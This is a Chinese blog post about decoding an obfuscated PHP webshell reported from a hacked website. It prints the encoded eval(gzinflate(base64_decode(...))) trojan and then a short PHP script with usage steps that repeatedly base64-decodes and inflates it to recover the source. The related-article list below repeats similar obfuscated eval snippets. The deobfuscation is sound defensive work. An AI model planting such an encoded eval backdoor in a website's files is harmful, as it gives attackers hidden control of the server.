一个PHP 代码加密(gzinflate)的解密脚本

最新推荐文章于 2022-04-27 18:55:44 发布
最新推荐文章于 2022-04-27 18:55:44 发布
阅读量2.4k 收藏 1
点赞数
分类专栏: T_L_PHP 文章标签: 脚本 PHP FP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/benwdm/article/details/83642120
版权

看到某论坛上有人报告说网站被挂加密马,贴出来的马码如下:

<?php
eval(gzinflate(base64_decode('DdI5jptQAADQ3pIPkWpmQmHMjhJlZAzfGGwGsAFDE302Ax+zGS/8a2VrUkRJpGjqadMlXS4Qpcqc4DXv/s3r+yZrxqPJy/Ho/b+vf54ef7z78vHD909/H38//fr89O3ni/Ho5WQ8Ss6wvN3jvEpL2Ce3ITwmHPM2TqI6Tm5v5FjnUdNYs5ls0RmaLPtdGx6BWyFuiGyJtO2FMCheNmykiN639dLA6dD2GnLQgMQKGiW9Ya1oaIMVlr1UIHqPyZfNKeO7c9zz4iRd8eIZi3wSmTwvihPTFLhJiEmC7oprGuOCdvlEhnhXZ7kvSmzJXkKCSNZRIgjhYkfwGV3ivd7bCil4h2nDqfrActfIA1fUHsn11i2z7bXo8y4c0gAGgOH2SB7k2pTcY85QwbJbSg/ypeQfugSQydauj0Y32NBRHI52vV0zU2BHwT5NVykSOtLG52lxtDChM6Y15EHp5TaJVvRG0Qtuubn6XbHQA42dsUVsMRsJ4CymdoWD16rilUbkVEStNEFIAcfnHdG1s0zZA3ewGmOeV01gIwD7cpVX2qqsmu6UWP6aAkUBnmX/AHzCMOzQbC6eZPG9TcEFCucXtpQoP9BqVd63EjGl53BnPrRkvFahovVKMmVW3s4/Movs4nYnQndDpB5mpELm2RBuZUNtD/78oQj6QK0cL5LbXO45dpbXBwiracRWolz5FhCnhCUroAMiZ9Tant7p264EJ9HZpEypEEyt4ah2NJdcIGoeK0iNVZ1tQJHgy/aKpNXhEmGBniR2w4cbMI8MgZrOD24cCVapRCZny7iAHnGe1Se4cEHQb5HSaPh4gstlaxZ0KqZnseyxSdCEk97c3d29Go/un6v/Bw==')));
?>

 小研究了一下,拼凑出一个解密脚本:

<?php
$str=file_get_contents('e.txt');
while (preg_match("/eval\(gzinflate\(base64_decode\('([^']*)'/",$str,$match)){
 $str=base64_decode($match[1]);
 $str=gzinflate($str);
 echo $str;
}
$fp=fopen('d.txt','w');
fputs($fp,$str);
fclose($fp);
?>

 用法如下:

1、把木马内容保存到一个文件中,命名为e.txt
2、在相同目录再建一个空文件,命名为d.txt
3、在把解密脚本保存为文件: decode.php

4、在命令行窗口执行decode.php,执行完成后,d.txt里的就是解密木马了。

 

 

benwdm
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php批量解密hp在线,gzinflate base64_decode 在线解密
weixin_29146313的博客
04-06 1582
PHP gzinflate base64_decode 加密代码格式: PHP文件包含字符串 eval(gzinflate(base64_decode PHP gzinflate base64_decode 在线解密 例如我需要解密一个类似如下内容的PHP加密代码eval(gzinflate(base64_decode(fVRtb9s2EP7sAfsPF0MopUSV5LVNh9hKU3RuV...
记一次PHP加密文件解密
weixin_33850890的博客
05-17 6658
<?php $œªç»="devuZo1WG3yfosLZJPBwgtlEXMFumkHGzdpaUKCVATxORjNSYiInvWrcDqhbeQmjwQhsCqvAcyWJxDLuFPXbETlINkdVHBgniMfrZeYKOoRGzaSptUvSZ2NcZ29msVgeZxflZEQcZ2gSG3Dcr2VmpFVQYXQcGXClTFL0srvETbL0IoDcCbfO...
gzinflate java_PHP base64+gzinflate压缩编码和解码代码
weixin_34929072的博客
02-15 256
base64+gzinflate压缩编码(加密)过的文件通常是以 eval(gzinflate(base64_decode( 为头的一个php文件。以下我们给出了相关的编码解码(加密解密)代码。压缩编码(加密)代码:function encode_file_contents($filename) {$type=strtolower(substr(strrchr($filename,'.'),1)...
php gzinflate base64_decode 解密
10-28
php gzinflate base64_decode 解密 密码:caonima
php eval 在线解密,eval(gzinflate(base64_decode解密方法 | CN-SEC 中文网
weixin_35878683的博客
04-04 2393
今天群里一位朋友发了一个php的马子,经过了gzinflate和base64_decode加密,求解密,这种加密方法我以前也见过,只用把eval改为echo即可实现解密,但是情况并不是我想象的那么简单,输出的依然是乱码,网上找了一下终于找到了解决之道,分享给大家。PHP目前在网络中被用的越来越多,加密解密的话题也一直没有停息过。下面简单介绍一下base64_decode+gzinflate压缩编码...
eval(gzinflate(base64_decode无限加密文件的解密代码
harryxlb的专栏
07-13 2722
eval(gzinflate(base64_decode无限加密文件的解密代码: $codefile = "function.php.txt"; $fp1 = fopen($codefile, "r"); $contents = fread($fp1, filesize($codefile)); fclose($fp1); // while (preg_match("/eval\s\
eval(gzinflate(base64_decode( php代码解密方法
jqqjj的博客
04-27 2814
今天网站被人入侵了,一查已攻击都上传的文件内容,发现有 eval(gzinflate(base64_decode(‘XXXXXX’)));这类代码,自己就想查看代码执行了哪些操作。 首先去掉eval()函数,打印一下原始代码,结果发现还是类似这样的代码,原来这玩意不简单呀。 那么这些加密是怎么做到的。其实也没什么的,就是循环N次使用gzinflate压缩代码而已,我们需要通过代码再循环反解出来即可。 #解密函数 function decode($str) { $maxTimes = 1000; //
eval(gzinflate(base64_decode解密方法
程序员无为的博客
10-28 5321
今天群里一位朋友发了一个php的马子,经过了gzinflate和base64_decode加密,求解密,这种加密方法我以前也见过,只用把eval改为echo即可实现解密,但是情况并不是我想象的那么简单,输出的依然是乱码,网上找了一下终于找到了解决之道,分享给大家。 PHP目前在网络中被用的越来越多,加密解密的话题也一直没有停息过。下面简单介绍一下base64_decode+gzinflate压缩编
加密解密PHP中常用的加密解密方法
民族风的专栏
04-26 6461
php加密解密:php加密解密函数通常可以用来加密一些有用的字符串存放在数据库里或作为各个子系统间同步登陆的令牌,并且通过解密算法解密字符串,该函数使用了base64和MD5加密解密。①第一种加密解密算法[php] view plain copy&lt;?php  function encryptDecrypt($key, $string, $decrypt){       if($decry...
风吟PHP 代码加密/解密
05-10
结合这两种技术,"风吟PHP代码加密/解密"工具首先对PHP代码进行gzip压缩,减少其体积,然后用Base64编码将压缩后的数据转化为文本字符串,这样就形成了一个看似无意义的字符串,进一步增加了代码的保密性。...
msn加密脚本加密
07-20
admin test wireshark my best job
phpjiami解密脚本.zip
05-28
www.phpjiami.com网站的解密: 将需要解密的文件拷进encode目录,浏览器访问目录phpjiami.php文件,将会自动执行解密过程,解密结果在decode目录。
怎样给PHP代码加密?PHP二进制加密解密的解决办法
12-19
最后,构建一个包含解压和执行语句的PHP脚本,并用`file_put_contents`写回文件。这样,当加密后的文件被执行时,PHP解释器会自动解压并执行编码的代码。 ```php <?php function encode_file_contents($filename) {...
风吟PHP 代码加密/解密.rar
07-16
总的来说,"风吟PHP 代码加密/解密.rar"为PHP开发者提供了一个简单但有效的代码保护方案,利用了base64和gzip压缩技术,旨在平衡代码的可读性和安全性。对于那些希望保护其知识产权,但又不想投入大量资源进行高级...
wiki-shan写的php在线加密解密程序
12-18
对应的写了一个简单的解密的,专门针对eval。这个原理很有用途的,在这里记下。复制代码 代码如下:<?php /* author:zhiwushan date:20080411 */ //已经加密的文件内容 $a=” eval(gzinflate(str_rot13(base64_...
PHP base64+gzinflate压缩编码和解码代码
10-30
base64+gzinflate压缩编码(加密)过的文件通常是以 <? eval(gzinflate(base64_decode( 为头的一个php文件。文中给出了编码和解码的代码
php eval 在线加密,evalgzinflate、 base64_decode三函数加密代码在线解密
weixin_29724477的博客
03-17 792
&lt;?phpeval(gzinflate(base64_decode(&#039;DZW3roRaokQ/Z 7VDoDG62kCvPemgWSE9942X/9OXtGqparySod/6redqiE9yn ydC8J7H9Fmc9F c9/ MJB BOWmJ53cc9zOcp4tX5pkjFGldd4Syh6C5TLcmrf5Io4LzRdm8uZIYr0rtx3oScc7...
php gzinflate(),php 利用gzinflate和base64_decode加密解密示例
weixin_31679307的博客
03-12 1149
php gzinflate和base64_decode加密解密感兴趣的小伙伴,下面一起跟随512笔记的小编两巴掌来看看吧!/*** gzinflate和base64_decode加密解密** @param* @arrange 五一二笔记网: 512PiC.com**/function encode_file_contents($filename) {$type=strtolower(substr...
PHP解压GZ字符串
最新发布
05-30
要解压缩GZ字符串,可以使用PHP的gzdecode函数。这个函数可以解压缩gzip格式的数据。 下面是一个示例代码: ```php $compressed_data = "H4sIAAAAAAAAA+3Qy27DMBCE4f9K2Nv6m4hZQmMjg1IwA0EDtq+sRJKHxQz 82jNz+JyW8sNzNz+3Wv2S9/JvAAAA=="; $uncompressed_data = gzdecode(base64_decode($compressed_data)); echo $uncompressed_data; ``` 在这个代码中,我们首先定义了一个压缩过的字符串,然后使用base64_decode函数将其解码。然后,我们将解码后的字符串传递给gzdecode函数,以解压缩数据。最后,我们将解压缩的数据打印到屏幕上。 注意,如果你的PHP版本低于5.4.0,那么gzdecode函数可能不存在。在这种情况下,你可以使用以下代码替代: ```php function gzdecode($data){ return gzinflate(substr($data,10,-8)); } ``` 这个函数使用了gzip格式的特定解压缩算法来解压缩数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值